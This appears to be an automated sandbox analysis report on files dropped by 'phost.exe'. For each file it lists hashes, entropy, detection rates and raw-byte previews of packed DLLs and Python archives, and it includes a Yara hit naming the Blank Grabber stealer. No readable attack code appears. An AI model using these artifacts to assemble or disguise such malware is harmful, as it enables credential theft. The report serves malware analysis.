                                                                                                                                                                                                                            Size (bytes):49944
                                                                                                                                                                                                                            Entropy (8bit):7.78315600372484
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:U/onT0xi3xXtfwYf5CVW3Bd7IGCVwU7SyixL7:U/k538e5CIRlIGCVwUO7
                                                                                                                                                                                                                            MD5:85C70974FAC8E621ED6E3E9A993FBD6F
                                                                                                                                                                                                                            SHA1:F83974E64AA57D7D027B815E95EBD7C8E45530F1
                                                                                                                                                                                                                            SHA-256:610983BBCB8EE27963C17EAD15E69AD76EC78FAC64DEB7345CA90D004034CDD6
                                                                                                                                                                                                                            SHA-512:142792750E4A5189DBEAA710E3F5B3689D593927EA77DED00EB5CAADA6B88D82A37459770845F1EA7C9F45DA5A6AE70E19BFCF76D9F1A56184C3164B736BCB18
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.l.3...3...3...:...9......1......0......>......;......7.......0...x...1...3...l.......;.......2.......2.......2...Rich3...................PE..d...f..e.........." ...#.............e....................................................`.............................................H.................... ..,...................................................q..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60696
                                                                                                                                                                                                                            Entropy (8bit):7.822236524949101
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:WbK/YBHE2gCtX+/9zyeoVIkwLMzKep8z+IGLPAt7SyWxU:WGAK2ghtGIk6MeeGyIGLPAtz
                                                                                                                                                                                                                            MD5:E7EF30080C1785BAF2F9BB8CF5AFE1B2
                                                                                                                                                                                                                            SHA1:B7D7D0E3B15DE9B1E177B57FD476CECBDD4FCB79
                                                                                                                                                                                                                            SHA-256:2891382070373D5070CB8FD6676AFC9F5EB4236251F8FC5C0941AF0C53A2D31E
                                                                                                                                                                                                                            SHA-512:C2EC431D2821879BB505D8ECA13FA3921DB016E00B8674FA62B03F27DC5CEE6DD0DE16BA567D19D4B0AF9A5CB34D544383A68CC63FF2FA9D8BB55E356D0D73E6
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>...z.z.z.s...|....x....v....r....~.....x.1...{.1...|.....y.z.......|.....{...o.{.....{.Richz.................PE..d...c..e.........." ...#.............-.......................................P............`.........................................HL.......I.......@.......................L.......................................9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):108312
                                                                                                                                                                                                                            Entropy (8bit):7.9301662560961494
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:HnHQe/FKYjTnmuJkv4D5ZIBGeKHC6ajQ6BWIGOqmbtbb9:HnHQe/MYjTnDJRX6Ge16ehbhx
                                                                                                                                                                                                                            MD5:3923E27B9378DA500039E996222FFEE6
                                                                                                                                                                                                                            SHA1:A9280559A71ABF390348E1B6A0FB1F2409649189
                                                                                                                                                                                                                            SHA-256:0275B03041F966E587D1C4C50266C3FDFF1E1A65F652AD07B59CB85845B5457E
                                                                                                                                                                                                                            SHA-512:051C613403FD80B9582DD48C1F38870CB26846D54B75603EA52A78202A72272107E95750DE78CD8F6C56951EBDE501B4892D90FB306326B86124C8CC97BCA594
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.R.!...!...!...Y=..!..+]...!..+]...!..+]...!..+]...!..M\...!...Y...!...!...!..M\...!..M\...!..M\...!..M\Q..!..M\...!..Rich.!..........PE..d...T..e.........." ...#.p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................@...........................................UPX0....................................UPX1.....p.......f..................@....rsrc........ .......j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):36120
                                                                                                                                                                                                                            Entropy (8bit):7.670480771561197
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:6EKW7574DsajR20fnfPHz8HLP8pfbnIGOINg5YiSyvIAMxkE3n1:jKW7hq00fnTQEbnIGOINy7Sy+xzn1
                                                                                                                                                                                                                            MD5:C8B153F0BE8569CE2C2DE3D55952D9C7
                                                                                                                                                                                                                            SHA1:0861D6DCD9B28ABB8B69048CAF3C073E94F87FDC
                                                                                                                                                                                                                            SHA-256:AF9F39D2A5D762214F6DE2C8FEC0A5BC6BE0B8223EF47164CAA4C6E3D6437A58
                                                                                                                                                                                                                            SHA-512:81CCBFFF0F4CDD1502AF9D73928B940098B9ACC58B19C1A939ECDF17418096294AF4A4529EE7A0BBE1C686E3B0254651E211C1093264D1835065A82711AC0379
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u...&...&...&.U&...&u..'...&u..'...&u..'...&u..'...&...'...&...'...&...&M..&...'...&...'...&..9&...&...'...&Rich...&........PE..d......e.........." ...#.P.........../.......................................P............`.........................................|K..P....I.......@.......................K.......................................;..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):87832
                                                                                                                                                                                                                            Entropy (8bit):7.917277859124498
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:cjQY6vZR307kwHMn3NsbM5PlvQzSqoSdPN1uruZkU2D90nGt4pcgIGZ1rA7SyTx7:EQY6nEZe3NsbI1QzSwlaugudNIGZ1rAP
                                                                                                                                                                                                                            MD5:BC2EBD2A95619AB14A16944B0AB8BDE5
                                                                                                                                                                                                                            SHA1:C31BA45B911A2664FC622BB253374AB7512FC35A
                                                                                                                                                                                                                            SHA-256:AEB3FD8B855B35204B5088C7A1591CC1CA78FFFE707D70E41D99564B6CB617C6
                                                                                                                                                                                                                            SHA-512:86A6685EFEC72860991C0F0FA50F46A208211D3F8FC44012B12437D141C5F1A24C34A366F164D225869680707B482AB27A2720C698EBE8026F1C5807E81F8437
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........TB#.5,p.5,p.5,p.M.p.5,p.I-q.5,p.I)q.5,p.I(q.5,p.I/q.5,pnH-q.5,p.M-q.5,p.5-p.5,pnH!q.5,pnH,q.5,pnH.p.5,pnH.q.5,pRich.5,p........PE..d......e.........." ...#. ...............................................................`.........................................4...L....................P.........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26904
                                                                                                                                                                                                                            Entropy (8bit):7.418027428269828
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:Xzh/iDHAPcpqyIGQUNz5YiSyvHAMxkEJ5YSv:jhiDHAP5yIGQUN97SyPx/Y+
                                                                                                                                                                                                                            MD5:FCBB24550F59068A37EA09A490923C8A
                                                                                                                                                                                                                            SHA1:1E51D9C156354E00909C9F016DDB392A832F8078
                                                                                                                                                                                                                            SHA-256:DE2AC6D99234A28DCF583D90DCA7256DE986FCA9E896C9AAFD1F18BB536978B8
                                                                                                                                                                                                                            SHA-512:62474BF9D5F39591240F71FD9270FCC7A2B2C0B4A1F93CBB57021040AD85B3AB8C401D17AEDF0141105118772F453C6137A026736F069CC7A965CB30E5479F07
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:W\.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.M[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........................PE..d...Y..e.........." ...#.0...............................................................`.............................................L.......P............`..............<..........................................@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):45336
                                                                                                                                                                                                                            Entropy (8bit):7.7177626825594965
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:O1X8HEfobVbgwsIZsQD182/q2vQttkmnIzPnzTpwOgIGLwgBT5YiSyvvBAMxkEn:CXz0gwsGsQD1ZbmiSOgIGLwgBd7SyZxL
                                                                                                                                                                                                                            MD5:F6D0876B14BCA5A264EC231895D80072
                                                                                                                                                                                                                            SHA1:D68B662CFC247C07851EF0764FE9652E3E2C0981
                                                                                                                                                                                                                            SHA-256:BCBF9A952473E53F130CE77B0DB69FE08C5845CE10DBE8C320B40F171A15D6A8
                                                                                                                                                                                                                            SHA-512:1DB02975634FFCC4E73FAC355D7F67A915C3B4189FEAF9E7B24EF831E9F4A2E60A4BD1EBFD8157282A4094814332D62957FCD204B20F2904527E203AB355AB8E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J./.+z|.+z|.+z|.S.|.+z|.W{}.+z|.W.}.+z|.W~}.+z|.Wy}.+z|}V{}.+z|.+{|.+z|.S{}.+z|}Vw}.+z|}Vz}.+z|}V.|.+z|}Vx}.+z|Rich.+z|................PE..d......e.........." ...#.p.......... q....................................................`.........................................D...P....................0......................................................0}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):59160
                                                                                                                                                                                                                            Entropy (8bit):7.835515959807496
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:e5ovI/e3wTAiHXhchuXbLfbmmKTnjBChRDLHKVIGOQQm7Syxx2e:e5fXAcew9KTjBCh1kIGOQQml
                                                                                                                                                                                                                            MD5:0FDEDCB9B3A45152239CA4B1AEA4B211
                                                                                                                                                                                                                            SHA1:1CCFF1F5E7B27C4156A231AD7A03BCC9695C5B92
                                                                                                                                                                                                                            SHA-256:0FC03D25467850181C0FC4F0F8919C8C47CBA2BF578698D4354AA84FD810C7F7
                                                                                                                                                                                                                            SHA-512:8CE5B38EE64AC0CDA831B6B2C746FB95BAADDA83665D8E125EAA8B4A07CB61B3EF88D60741B978B2108EC08B067F1C9C934099F539B1E24F55E3CA8350359611
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@.g...g...g.......g..../..g......g....+..g....*..g....-..g..q./..g..../..g...g/..f..q.#..g..q....g..q...g..q.,..g..Rich.g..........PE..d......e.........." ...#.........p.. ........................................@............`..........................................;..P....9.......0..........8............;...................................... %..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):67352
                                                                                                                                                                                                                            Entropy (8bit):7.856108604878049
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:1536:URuyAdinkEweTTDWPnQfNnPAdu8LfPXrBIGC777m7Synx5:2F9fEo58DPXdIGC77yN
                                                                                                                                                                                                                            MD5:53996068AE9CF68619DA8CB142410D5E
                                                                                                                                                                                                                            SHA1:9EB7465D6F22AB03DAC04CFCE668811A87E198F2
                                                                                                                                                                                                                            SHA-256:CBD320C42277086CD962FD0B25842904CEB436346D380319625F54363F031DCF
                                                                                                                                                                                                                            SHA-512:D5FBC53A2FFFECB1F3DA4B126E306961DE3B8070B5F722B6ED5E20BEF6AF48D52EDF96C975F68278E337BC78A25B4227E9EB44B51BAA786365A67CF977E4643E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.k.4.8.4.8.4.8.L)8.4.8.H.9.4.8.H.9.4.8.H.9.4.8.H.9.4.8kI.9.4.8.4.8#5.8.L.9.4.8kI.9.4.8kI.9.4.8kIE8.4.8kI.9.4.8Rich.4.8........................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... ..........8............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1329520
                                                                                                                                                                                                                            Entropy (8bit):5.586655762137983
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:uttcY+b+vOmgRF1+fYNXPh26UZWAzCu7j5D95wdgkVodYOPjwwMJ9gCCaYc2I:uttcY+mHCiCA5TNqodYOPEPEaYc2I
                                                                                                                                                                                                                            MD5:898E35281A756640780DBC31A0B78452
                                                                                                                                                                                                                            SHA1:845B59CFD9FB152725F250A872E9D1D7A66AF258
                                                                                                                                                                                                                            SHA-256:0DAA440C78582A693DABBC2325A06D817131BB170BAD436B126BAD896F1377CD
                                                                                                                                                                                                                            SHA-512:421CC4A15E94293E53F1039B8BB5BE7EDCBC8E3E0E4ABC7F34FAF991993F51CB5F51493B58BB341CB9579347EC134B02104454075A8E7E33E45B8E3A66A44D79
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):110302
                                                                                                                                                                                                                            Entropy (8bit):7.76600595304077
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:bWwadoInRQfg0tr7VIXK9kVqYy/XZaWjoYp88TP4Kb:ba6KzixQOkVqYWXZaWjxpPP
                                                                                                                                                                                                                            MD5:504E4173AAA7A26BDD8D03DE460B8361
                                                                                                                                                                                                                            SHA1:F11272BD0EAD47DD82AF12ACB38292913803BA87
                                                                                                                                                                                                                            SHA-256:ACD828587F1820C3AE85091B332CC5A6D56385A7516639772EB67A0FF2ABEB1A
                                                                                                                                                                                                                            SHA-512:B6442DB7005CB0D374FA6BB8A82890E1B4D8CF3EE6774149DFBC3B40EC527D8EF40E66AFAF7355CEFE8BA54E287EBE458E3554BF5C843BAA6C5A7F5243B4B13F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:PK........mL.Y.Y1.h...h.......stub-o.pyc..........Ug.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1629464
                                                                                                                                                                                                                            Entropy (8bit):7.952620301087112
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
                                                                                                                                                                                                                            MD5:27515B5BB912701ABB4DFAD186B1DA1F
                                                                                                                                                                                                                            SHA1:3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
                                                                                                                                                                                                                            SHA-256:FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
                                                                                                                                                                                                                            SHA-512:087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):29968
                                                                                                                                                                                                                            Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                            MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                            SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                            SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                            SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):229144
                                                                                                                                                                                                                            Entropy (8bit):7.930038440560372
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
                                                                                                                                                                                                                            MD5:6EDA5A055B164E5E798429DCD94F5B88
                                                                                                                                                                                                                            SHA1:2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
                                                                                                                                                                                                                            SHA-256:377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
                                                                                                                                                                                                                            SHA-512:74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1826072
                                                                                                                                                                                                                            Entropy (8bit):7.993990461497291
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:49152:fTBxkJIkNEakpCPK1JQyHi3p70PHY6/g7:teFNlUsK1ij31WYUW
                                                                                                                                                                                                                            MD5:86D9B8B15B0340D6EC235E980C05C3BE
                                                                                                                                                                                                                            SHA1:A03BDD45215A0381DCB3B22408DBC1F564661C73
                                                                                                                                                                                                                            SHA-256:12DBBCD67015D6CDB680752184107B7DEB84E906B0E8E860385F85D33858A5F6
                                                                                                                                                                                                                            SHA-512:D360CC3F00D90FD04CBBA09D879E2826968DF0C1FDC44890C60B8450FE028C3E767450C3543C62D4F284FB7E004A9A33C52538C2279221EE6CBDB1A9485F88B2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................m.................x...s...x......x......x......Rich............PE..d...=..e.........." ...#.........@Q...l..PQ...................................m...........`.........................................H/l......)l...... l......``..V............l. ...........................0.l.(...p.l.@...........................................UPX0.....@Q.............................UPX1.........PQ.....................@....rsrc........ l.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):630736
                                                                                                                                                                                                                            Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                            MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                            SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                            SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                            SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\phost.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):456
                                                                                                                                                                                                                            Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                            MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                            SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                            SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                            SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                            Reputation:unknown
